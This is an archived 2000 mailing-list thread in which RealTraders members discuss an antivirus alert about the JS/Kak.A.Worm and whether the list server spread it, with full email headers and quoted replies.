
[RT] RE: GEN - RT virus?



Yes, just finished quarantining it and get rid of it!

-----Original Message-----
From: listmanager@xxxxxxxxxxxxxxx [mailto:listmanager@xxxxxxxxxxxxxxx] On Behalf Of ROBERT ROESKE
Sent: Tuesday, February 15, 2000 1:02 PM
To: realtraders@xxxxxxxxxxxxxxx
Subject: [RT] GEN - RT virus?

Any way to tell if this virus was attached at the RT server or in my
computer?  Anyone else getting this virus message?
BR

Antigen for Exchange found Unknown infected with JS/Kak.A.Worm virus.
The file is currently Deleted.  The message, "[RT] MKT - OEX", was
sent from ROBERT ROESKE  and was discovered in IMC Queues\Inbound
located at Distrivision/NORTHAMERICA/C1PLENAEXI01.

From ???@??? Tue Feb 15 18:29:11 2000
Return-Path: <listmanager@xxxxxxxxxxxxxxx>
Received: from mail.thetrellis.net ([208.179.56.11])
	by purebytes.com (8.9.3/8.9.3) with SMTP id SAA00645
	for <neal@xxxxxxxxxxxxx>; Tue, 15 Feb 2000 18:38:48 -0700
Received: from REALTRADERS.COM
	([208.179.56.198])
	by mail.thetrellis.net; Tue, 15 Feb 2000 17:32:51 -0800
Received: from crusoe.crusoe.net by realtraders.com
	with SMTP (MDaemon.v2.8.5.0.R)
	for <realtraders@xxxxxxxxxxxxxxx>; Tue, 15 Feb 2000 17:26:14 -0800
Received: from pgms ([206.136.71.150]) by crusoe.crusoe.net
          (Post.Office MTA v3.5.3 release 223 ID# 0-52487U2500L250S0V35)
          with SMTP id net; Tue, 15 Feb 2000 20:29:22 -0500
Message-ID: <004001bf781d$3ed69c20$964788ce@xxxx>
Reply-To: "swp" <swp@xxxxxxxxxx>
From: "swp" <swp@xxxxxxxxxx>
To: "<realtraders@xxxxxxxxxxxxxxx>
	\"Realtraders\"" <realtraders@xxxxxxxxxxxxxxx>
References: <NBBBIJIEGOMGBKDAOOIIIEJCEMAA.spider@xxxxxxxxxxxxxxx>
Subject: [RT] Re: GEN - RT virus? - I am sending this as plain text!
Date: Tue, 15 Feb 2000 20:29:17 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
X-MDaemon-Deliver-To: realtraders@xxxxxxxxxxxxxxx
X-Return-Path: swp@xxxxxxxxxx
Sender: listmanager@xxxxxxxxxxxxxxx
X-MDMailing-List: realtraders@xxxxxxxxxxxxxxx
X-MDSend-Notifications-To: listmanager@xxxxxxxxxxxxxxx
Status:   

Not exactly. I am still getting an Active X warning from this email!!!

---
Steven W. Poser, President
Poser Global Market Strategies Inc.

url: http://www.poserglobal.com
email: swp@xxxxxxxxxxxxxxx

Tel: 201-995-0845
Fax: 201-995-0846
----- Original Message -----
From: Ge Wong
To: realtraders@xxxxxxxxxxxxxxxxxxxxxxxxxx@realtraders.com
Sent: Tuesday, February 15, 2000 8:28 PM
Subject: [RT] RE: GEN - RT virus?


Yes, just finished quarantining it and get rid of it!


-----Original Message-----
From: listmanager@xxxxxxxxxxxxxxx [mailto:listmanager@xxxxxxxxxxxxxxx]On
Behalf Of ROBERT ROESKE
Sent: Tuesday, February 15, 2000 1:02 PM
To: realtraders@xxxxxxxxxxxxxxx
Subject: [RT] GEN - RT virus?

Any way to tell if this virus was attached at the RT server or in my
computer?  Anyone else getting this virus message?
BR


Antigen for Exchange found Unknown infected with JS/Kak.A.Worm virus.
The file is currently Deleted.  The message, "[RT] MKT - OEX", was
sent from ROBERT ROESKE  and was discovered in IMC Queues\Inbound
located at Distrivision/NORTHAMERICA/C1PLENAEXI01.